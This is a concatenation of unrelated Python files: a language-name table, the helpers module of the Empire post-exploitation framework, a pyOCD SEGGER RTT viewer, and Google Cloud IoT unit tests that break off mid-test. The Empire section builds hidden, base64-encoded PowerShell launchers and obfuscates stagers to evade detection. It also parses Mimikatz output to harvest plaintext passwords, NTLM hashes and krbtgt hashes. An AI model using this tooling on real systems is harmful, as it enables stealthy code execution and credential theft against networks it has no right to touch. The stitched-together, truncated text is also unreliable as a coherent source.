'sah': {'english': 'Sakha', 'native': '\u0421\u0430\u0445\u0430\u043b\u044b\u044b'},
'sat': {'english': 'Santali', 'native': '\u0938\u0902\u0924\u093e\u0932\u0940'},
'si': {'english': 'Sinhala', 'native': '\u0dc3\u0dd2\u0d82\u0dc4\u0dbd'},
'son': {'english': 'Songhai', 'native': 'So\u014bay'},
'sr': {'english': 'Serbian', 'native': '\u0421\u0440\u043f\u0441\u043a\u0438'},
'sr-Cyrl': {'english': 'Serbian', 'native': '\u0421\u0440\u043f\u0441\u043a\u0438'},
'sr-Latn': {'english': 'Serbian', 'native': 'Srpski'},
'ss': {'english': 'Siswati', 'native': 'siSwati'},
'st': {'english': 'Southern Sotho', 'native': 'Sesotho'},
'sw': {'english': 'Swahili', 'native': 'Kiswahili'},
'ta': {'english': 'Tamil', 'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd'},
'ta-IN': {
'english': 'Tamil (India)',
'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd (\u0b87\u0ba8\u0bcd\u0ba4\u0bbf\u0baf\u0bbe)', # noqa
},
'ta-LK': {
'english': 'Tamil (Sri Lanka)',
'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd (\u0b87\u0bb2\u0b99\u0bcd\u0b95\u0bc8)', # noqa
},
'tl': {'english': 'Tagalog', 'native': 'Tagalog'},
'tn': {'english': 'Tswana', 'native': 'Setswana'},
'ts': {'english': 'Tsonga', 'native': 'Xitsonga'},
'tsz': {'english': 'Pur\xe9pecha', 'native': 'Pur\xe9pecha'},
'tt-RU': {'english': 'Tatar', 'native': 'Tatar\xe7a'},
'uz': {'english': 'Uzbek', 'native': 'O\u02bbzbek tili'},
've': {'english': 'Venda', 'native': 'Tshiven\u1e13a'},
'wo': {'english': 'Wolof', 'native': 'Wolof'},
'x-testing': {
'english': 'Testing',
'native': '\u0166\u1e17\u015f\u0167\u012b\u019e\u0260',
},
'xh': {'english': 'Xhosa', 'native': 'isiXhosa'},
'yo': {'english': 'Yoruba', 'native': 'Yor\xf9b\xe1'},
'zu': {'english': 'Zulu', 'native': 'isiZulu'},
}
ALL_LANGUAGES = {**AMO_LANGUAGES, **ADDITIONAL_PRODUCT_LANGUAGES}
| |
"""
Misc. helper functions used in Empire.
Includes the PowerShell functions that generate the
randomized stagers.
"""
from time import localtime, strftime
from Crypto.Random import random
import re
import string
import commands
import base64
import binascii
import sys
import os
import socket
import sqlite3
import iptools
###############################################################
#
# Validation methods
#
###############################################################
def validate_hostname(hostname):
"""
Tries to validate a hostname.
"""
if len(hostname) > 255: return False
if hostname[-1:] == ".": hostname = hostname[:-1]
allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validate_ip(IP):
"""
Uses iptools to validate an IP.
"""
return iptools.ipv4.validate_ip(IP)
def validate_ntlm(data):
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
if allowed.match(data):
return True
else:
return False
def generate_ip_list(s):
"""
Takes a comma separated list of IP/range/CIDR addresses and
generates an IP range list.
"""
# strip newlines and make everything comma separated
s = ",".join(s.splitlines())
# strip out spaces
s = ",".join(s.split(" "))
ranges = ""
if s and s != "":
parts = s.split(",")
for part in parts:
p = part.split("-")
if len(p) == 2:
if iptools.ipv4.validate_ip(p[0]) and iptools.ipv4.validate_ip(p[1]):
ranges += "('"+str(p[0])+"', '"+str(p[1])+"'),"
else:
if "/" in part and iptools.ipv4.validate_cidr(part):
ranges += "'"+str(p[0])+"',"
elif iptools.ipv4.validate_ip(part):
ranges += "'"+str(p[0])+"',"
if ranges != "":
return eval("iptools.IpRangeList("+ranges+")")
else:
return None
else:
return None
####################################################################################
#
# Randomizers/obfuscators
#
####################################################################################
def random_string(length=-1, charset=string.ascii_letters):
"""
Returns a random string of "length" characters.
If no length is specified, resulting string is in between 6 and 15 characters.
A character set can be specified, defaulting to just alpha letters.
"""
if length == -1: length = random.randrange(6,16)
random_string = ''.join(random.choice(charset) for x in range(length))
return random_string
def obfuscate_num(N, mod):
"""
Take a number and modulus and return an obsucfated form.
Returns a string of the obfuscated number N
"""
d = random.randint(1, mod)
left = int(N/d)
right = d
remainder = N % d
return "(%s*%s+%s)" %(left, right, remainder)
def randomize_capitalization(data):
"""
Randomize the capitalization of a string.
"""
return "".join( random.choice([k.upper(), k ]) for k in data )
def chunks(l, n):
"""
Generator to split a string l into chunks of size n.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
####################################################################################
#
# Specific PowerShell helpers
#
####################################################################################
def enc_powershell(raw):
"""
Encode a PowerShell command into a form usable by powershell.exe -enc ...
"""
return base64.b64encode("".join([char + "\x00" for char in unicode(raw)]))
def powershell_launcher_arch(raw):
"""
Build a one line PowerShell launcher with an -enc command.
Architecture independent.
"""
# encode the data into a form usable by -enc
encCMD = enc_powershell(raw)
# get the correct PowerShell path and set it temporarily to %pspath%
triggerCMD = "if %PROCESSOR_ARCHITECTURE%==x86 (set pspath='') else (set pspath=%WinDir%\\syswow64\\windowspowershell\\v1.0\\)&"
# invoke PowerShell with the appropriate options
# triggerCMD += "call %pspath%powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encCMD
triggerCMD += "call %pspath%powershell.exe -NoP -NonI -W Hidden -Enc " + encCMD
return triggerCMD
def powershell_launcher(raw):
"""
Build a one line PowerShell launcher with an -enc command.
"""
# encode the data into a form usable by -enc
encCMD = enc_powershell(raw)
return "powershell.exe -NoP -NonI -W Hidden -Enc " + encCMD
def parse_powershell_script(data):
"""
Parse a raw PowerShell file and return the function names.
"""
p = re.compile("function(.*){")
return [x.strip() for x in p.findall(data)]
def strip_powershell_comments(data):
"""
Strip block comments, line comments, and emtpy lines from a
PowerShell file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
# strip blank lines and lines starting with #
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")))])
return strippedCode
###############################################################
#
# Parsers
#
###############################################################
def parse_credentials(data):
"""
Parse module output, looking for any parseable sections.
"""
parts = data.split("\n")
# tag for Invoke-Mimikatz output
if parts[0].startswith("Hostname:"):
return parse_mimikatz(data)
# collection/prompt output
elif parts[0].startswith("[+] Prompted credentials:"):
parts = parts[0].split("->")
if len(parts) == 2:
username = parts[1].split(":",1)[0].strip()
password = parts[1].split(":",1)[1].strip()
if "\\" in username:
domain = username.split("\\")[0].strip()
username = username.split("\\")[1].strip()
else:
domain = ""
return [("plaintext", domain, username, password, "", "")]
else:
print helpers.color("[!] Error in parsing prompted credential output.")
return None
else:
return None
def parse_mimikatz(data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":",1)[1].strip()
elif "Domain" in line:
domain = line.split(":",1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":",1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in xrange(8,13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in xrange(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x+2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return uniquify_tuples(creds)
###############################################################
#
# Miscellaneous methods (formatting, sorting, etc.)
#
###############################################################
def get_config(fields):
"""
Helper to pull common database config information outside of the
normal menu execution.
Fields should be comma separated.
i.e. 'version,install_path'
"""
conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
conn.isolation_level = None
cur = conn.cursor()
cur.execute("SELECT "+fields+" FROM config")
results = cur.fetchone()
cur.close()
conn.close()
return results
def get_datetime():
"""
Return the current date/time
"""
return strftime("%Y-%m-%d %H:%M:%S", localtime())
def get_file_datetime():
"""
Return the current date/time in a format workable for a file name.
"""
return strftime("%Y-%m-%d_%H-%M-%S", localtime())
def lhost():
"""
Return the local IP.
"""
if os.name != "nt":
import fcntl
import struct
def get_interface_ip(ifname):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except IOError as e:
return ""
ip = ""
try:
ip = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
pass
except:
print "Unexpected error:", sys.exc_info()[0]
return ip
if (ip == "" or ip.startswith("127.")) and os.name != "nt":
interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
for ifname in interfaces:
try:
ip = get_interface_ip(ifname)
if ip != "":
break
except:
print "Unexpected error:", sys.exc_info()[0]
pass
return ip
def color(string, color=None):
"""
Change text color for the Linux terminal.
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
elif color.lower() == "green":
attr.append('32')
elif color.lower() == "blue":
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
if string.startswith("[!]"):
attr.append('31')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.startswith("[+]"):
attr.append('32')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.startswith("[*]"):
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
return string
def unique(seq, idfun=None):
# uniquify a list, order preserving
# from http://www.peterbe.com/plog/uniqifiers-benchmark
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in seq:
marker = idfun(item)
# in old Python versions:
# if seen.has_key(marker)
# but in new ones:
if marker in seen: continue
seen[marker] = 1
result.append(item)
return result
def uniquify_tuples(tuples):
# uniquify mimikatz tuples based on the password
# cred format- (credType, domain, username, password, hostname, sid)
seen = set()
return [item for item in tuples if "%s%s%s%s"%(item[0],item[1],item[2],item[3]) not in seen and not seen.add("%s%s%s%s"%(item[0],item[1],item[2],item[3]))]
def urldecode(url):
"""
URL decode a string.
"""
rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
return rex.sub(htc,url)
def decode_base64(data):
"""
Try to decode a base64 string.
From http://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding
"""
missing_padding = 4 - len(data) % 4
if missing_padding:
data += b'='* missing_padding
try:
result = base64.decodestring(data)
return result
except binascii.Error:
# if there's a decoding error, just return the data
return data
def encode_base64(data):
"""
Decode data as a base64 string.
"""
return base64.encodestring(data).strip()
def complete_path(text, line, arg=False):
"""
Helper for tab-completion of file paths.
"""
# stolen from dataq at
# http://stackoverflow.com/questions/16826172/filename-tab-completion-in-cmd-cmd-of-python
if arg:
# if we have "command something path"
argData = line.split()[1:]
else:
# if we have "command path"
argData = line.split()[0:]
if not argData or len(argData) == 1:
completions = os.listdir('./')
else:
dir, part, base = argData[-1].rpartition('/')
if part == '':
dir = './'
elif dir == '':
dir = '/'
completions = []
for f in os.listdir(dir):
if f.startswith(base):
if os.path.isfile(os.path.join(dir,f)):
completions.append(f)
else:
completions.append(f+'/')
return completions
| |
# pyOCD debugger
# Copyright (c) 2021 mikisama
# Copyright (C) 2021 Ciro Cattuto <ciro.cattuto@gmail.com>
# Copyright (C) 2021 Simon D. Levy <simon.d.levy@gmail.com>
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from typing import List
import logging
from pyocd.core.helpers import ConnectHelper
from pyocd.core.memory_map import MemoryMap, MemoryRegion, MemoryType
from pyocd.core.soc_target import SoCTarget
from pyocd.subcommands.base import SubcommandBase
from pyocd.utility.cmdline import convert_session_options, int_base_0
from pyocd.utility.kbhit import KBHit
from ctypes import Structure, c_char, c_int32, c_uint32, sizeof
LOG = logging.getLogger(__name__)
class SEGGER_RTT_BUFFER_UP(Structure):
"""@brief `SEGGER RTT Ring Buffer` target to host."""
_fields_ = [
("sName", c_uint32),
("pBuffer", c_uint32),
("SizeOfBuffer", c_uint32),
("WrOff", c_uint32),
("RdOff", c_uint32),
("Flags", c_uint32),
]
class SEGGER_RTT_BUFFER_DOWN(Structure):
"""@brief `SEGGER RTT Ring Buffer` host to target."""
_fields_ = [
("sName", c_uint32),
("pBuffer", c_uint32),
("SizeOfBuffer", c_uint32),
("WrOff", c_uint32),
("RdOff", c_uint32),
("Flags", c_uint32),
]
class SEGGER_RTT_CB(Structure):
"""@brief `SEGGER RTT control block` structure. """
_fields_ = [
("acID", c_char * 16),
("MaxNumUpBuffers", c_int32),
("MaxNumDownBuffers", c_int32),
("aUp", SEGGER_RTT_BUFFER_UP * 3),
("aDown", SEGGER_RTT_BUFFER_DOWN * 3),
]
class RTTSubcommand(SubcommandBase):
"""@brief `pyocd rtt` subcommand."""
NAMES = ["rtt"]
HELP = "SEGGER RTT Viewer."
@classmethod
def get_args(cls) -> List[argparse.ArgumentParser]:
"""@brief Add this subcommand to the subparsers object."""
rtt_parser = argparse.ArgumentParser(cls.HELP, add_help=False)
rtt_options = rtt_parser.add_argument_group("rtt options")
rtt_options.add_argument("-a", "--address", type=int_base_0, default=None,
help="Start address of RTT control block search range.")
rtt_options.add_argument("-s", "--size", type=int_base_0, default=None,
help="Size of RTT control block search range.")
return [cls.CommonOptions.COMMON, cls.CommonOptions.CONNECT, rtt_parser]
def invoke(self) -> int:
session = None
kb = None
try:
session = ConnectHelper.session_with_chosen_probe(
project_dir=self._args.project_dir,
config_file=self._args.config,
user_script=self._args.script,
no_config=self._args.no_config,
pack=self._args.pack,
unique_id=self._args.unique_id,
target_override=self._args.target_override,
frequency=self._args.frequency,
blocking=(not self._args.no_wait),
connect_mode=self._args.connect_mode,
options=convert_session_options(self._args.options))
if session is None:
LOG.error("No target device available")
return 1
with session:
target: SoCTarget = session.board.target
memory_map: MemoryMap = target.get_memory_map()
ram_region: MemoryRegion = memory_map.get_default_region_of_type(MemoryType.RAM)
if self._args.address is None or self._args.size is None:
rtt_range_start = ram_region.start
rtt_range_size = ram_region.length
elif ram_region.start <= self._args.address and self._args.size <= ram_region.length:
rtt_range_start = self._args.address
rtt_range_size = self._args.size
LOG.info(f"RTT control block search range [{rtt_range_start:#08x}, {rtt_range_size:#08x}]")
data = target.read_memory_block8(rtt_range_start, rtt_range_size)
pos = bytes(data).find(b"SEGGER RTT")
if pos == -1:
LOG.error("No RTT control block available")
return 1
rtt_cb_addr = rtt_range_start + pos
rtt_cb = SEGGER_RTT_CB.from_buffer(bytearray(data[pos:]))
up_addr = rtt_cb_addr + SEGGER_RTT_CB.aUp.offset
down_addr = up_addr + sizeof(SEGGER_RTT_BUFFER_UP) * rtt_cb.MaxNumUpBuffers
LOG.info(f"_SEGGER_RTT @ {rtt_cb_addr:#08x} with {rtt_cb.MaxNumUpBuffers} aUp and {rtt_cb.MaxNumDownBuffers} aDown")
# some targets might need this here
#target.reset_and_halt()
target.resume()
# set up terminal input
kb = KBHit()
# byte array to send via RTT
cmd = bytes()
while True:
# read data from up buffers (target -> host)
data = target.read_memory_block8(up_addr, sizeof(SEGGER_RTT_BUFFER_UP))
up = SEGGER_RTT_BUFFER_UP.from_buffer(bytearray(data))
if up.WrOff > up.RdOff:
"""
|oooooo|xxxxxxxxxxxx|oooooo|
0 rdOff WrOff SizeOfBuffer
"""
data = target.read_memory_block8(up.pBuffer + up.RdOff, up.WrOff - up.RdOff)
target.write_memory(up_addr + SEGGER_RTT_BUFFER_UP.RdOff.offset, up.WrOff)
print(bytes(data).decode(), end="", flush=True)
elif up.WrOff < up.RdOff:
"""
|xxxxxx|oooooooooooo|xxxxxx|
0 WrOff RdOff SizeOfBuffer
"""
data = target.read_memory_block8(up.pBuffer + up.RdOff, up.SizeOfBuffer - up.RdOff)
data += target.read_memory_block8(up.pBuffer, up.WrOff)
target.write_memory(up_addr + SEGGER_RTT_BUFFER_UP.RdOff.offset, up.WrOff)
print(bytes(data).decode(), end="", flush=True)
else: # up buffer is empty
# try and fetch character
if not kb.kbhit():
continue
c = kb.getch()
if ord(c) == 8 or ord(c) == 127: # process backspace
print("\b \b", end="", flush=True)
cmd = cmd[:-1]
continue
elif ord(c) == 27: # process ESC
break
else:
print(c, end="", flush=True)
cmd += c.encode()
# keep accumulating until we see CR or LF
if not c in "\r\n":
continue
# SEND TO TARGET
data = target.read_memory_block8(down_addr, sizeof(SEGGER_RTT_BUFFER_DOWN))
down = SEGGER_RTT_BUFFER_DOWN.from_buffer(bytearray(data))
# compute free space in down buffer
if down.WrOff >= down.RdOff:
num_avail = down.SizeOfBuffer - (down.WrOff - down.RdOff)
else:
num_avail = down.RdOff - down.WrOff - 1
# wait until there's space for the entire string in the RTT down buffer
if (num_avail < len(cmd)):
continue
# write data to down buffer (host -> target), char by char
for i in range(len(cmd)):
target.write_memory_block8(down.pBuffer + down.WrOff, cmd[i:i+1])
down.WrOff += 1
if down.WrOff == down.SizeOfBuffer:
down.WrOff = 0;
target.write_memory(down_addr + SEGGER_RTT_BUFFER_DOWN.WrOff.offset, down.WrOff)
# clear it and start anew
cmd = bytes()
except KeyboardInterrupt:
pass
finally:
if session:
session.close()
if kb:
kb.set_normal_term()
return 0
| |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.cloud import iot_v1
from google.cloud.iot_v1.proto import device_manager_pb2
from google.cloud.iot_v1.proto import resources_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestDeviceManagerClient(object):
def test_create_device_registry(self):
# Setup Expected Response
id_ = 'id3355'
name = 'name3373707'
expected_response = {'id': id_, 'name': name}
expected_response = resources_pb2.DeviceRegistry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
parent = client.location_path('[PROJECT]', '[LOCATION]')
device_registry = {}
response = client.create_device_registry(parent, device_registry)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.CreateDeviceRegistryRequest(
parent=parent, device_registry=device_registry)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_device_registry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
parent = client.location_path('[PROJECT]', '[LOCATION]')
device_registry = {}
with pytest.raises(CustomException):
client.create_device_registry(parent, device_registry)
def test_get_device_registry(self):
# Setup Expected Response
id_ = 'id3355'
name_2 = 'name2-1052831874'
expected_response = {'id': id_, 'name': name_2}
expected_response = resources_pb2.DeviceRegistry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
response = client.get_device_registry(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.GetDeviceRegistryRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_device_registry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
with pytest.raises(CustomException):
client.get_device_registry(name)
def test_update_device_registry(self):
# Setup Expected Response
id_ = 'id3355'
name = 'name3373707'
expected_response = {'id': id_, 'name': name}
expected_response = resources_pb2.DeviceRegistry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
device_registry = {}
update_mask = {}
response = client.update_device_registry(device_registry, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.UpdateDeviceRegistryRequest(
device_registry=device_registry, update_mask=update_mask)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_device_registry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
device_registry = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_device_registry(device_registry, update_mask)
def test_delete_device_registry(self):
channel = ChannelStub()
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
client.delete_device_registry(name)
assert len(channel.requests) == 1
expected_request = device_manager_pb2.DeleteDeviceRegistryRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_device_registry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
with pytest.raises(CustomException):
client.delete_device_registry(name)
def test_list_device_registries(self):
# Setup Expected Response
next_page_token = ''
device_registries_element = {}
device_registries = [device_registries_element]
expected_response = {
'next_page_token': next_page_token,
'device_registries': device_registries
}
expected_response = device_manager_pb2.ListDeviceRegistriesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
parent = client.location_path('[PROJECT]', '[LOCATION]')
paged_list_response = client.list_device_registries(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.device_registries[0] == resources[0]
assert len(channel.requests) == 1
expected_request = device_manager_pb2.ListDeviceRegistriesRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_device_registries_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
parent = client.location_path('[PROJECT]', '[LOCATION]')
paged_list_response = client.list_device_registries(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_device(self):
# Setup Expected Response
id_ = 'id3355'
name = 'name3373707'
num_id = 1034366860
blocked = True
expected_response = {
'id': id_,
'name': name,
'num_id': num_id,
'blocked': blocked
}
expected_response = resources_pb2.Device(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
device = {}
response = client.create_device(parent, device)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.CreateDeviceRequest(
parent=parent, device=device)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_device_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
device = {}
with pytest.raises(CustomException):
client.create_device(parent, device)
def test_get_device(self):
# Setup Expected Response
id_ = 'id3355'
name_2 = 'name2-1052831874'
num_id = 1034366860
blocked = True
expected_response = {
'id': id_,
'name': name_2,
'num_id': num_id,
'blocked': blocked
}
expected_response = resources_pb2.Device(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
response = client.get_device(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.GetDeviceRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_device_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
with pytest.raises(CustomException):
client.get_device(name)
def test_update_device(self):
# Setup Expected Response
id_ = 'id3355'
name = 'name3373707'
num_id = 1034366860
blocked = True
expected_response = {
'id': id_,
'name': name,
'num_id': num_id,
'blocked': blocked
}
expected_response = resources_pb2.Device(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
device = {}
update_mask = {}
response = client.update_device(device, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.UpdateDeviceRequest(
device=device, update_mask=update_mask)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_device_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
device = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_device(device, update_mask)
def test_delete_device(self):
channel = ChannelStub()
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
client.delete_device(name)
assert len(channel.requests) == 1
expected_request = device_manager_pb2.DeleteDeviceRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_device_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
with pytest.raises(CustomException):
client.delete_device(name)
def test_list_devices(self):
# Setup Expected Response
next_page_token = ''
devices_element = {}
devices = [devices_element]
expected_response = {
'next_page_token': next_page_token,
'devices': devices
}
expected_response = device_manager_pb2.ListDevicesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
paged_list_response = client.list_devices(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.devices[0] == resources[0]
assert len(channel.requests) == 1
expected_request = device_manager_pb2.ListDevicesRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_devices_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
paged_list_response = client.list_devices(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_modify_cloud_to_device_config(self):
# Setup Expected Response
version = 351608024
binary_data_2 = b'-37'
expected_response = {'version': version, 'binary_data': binary_data_2}
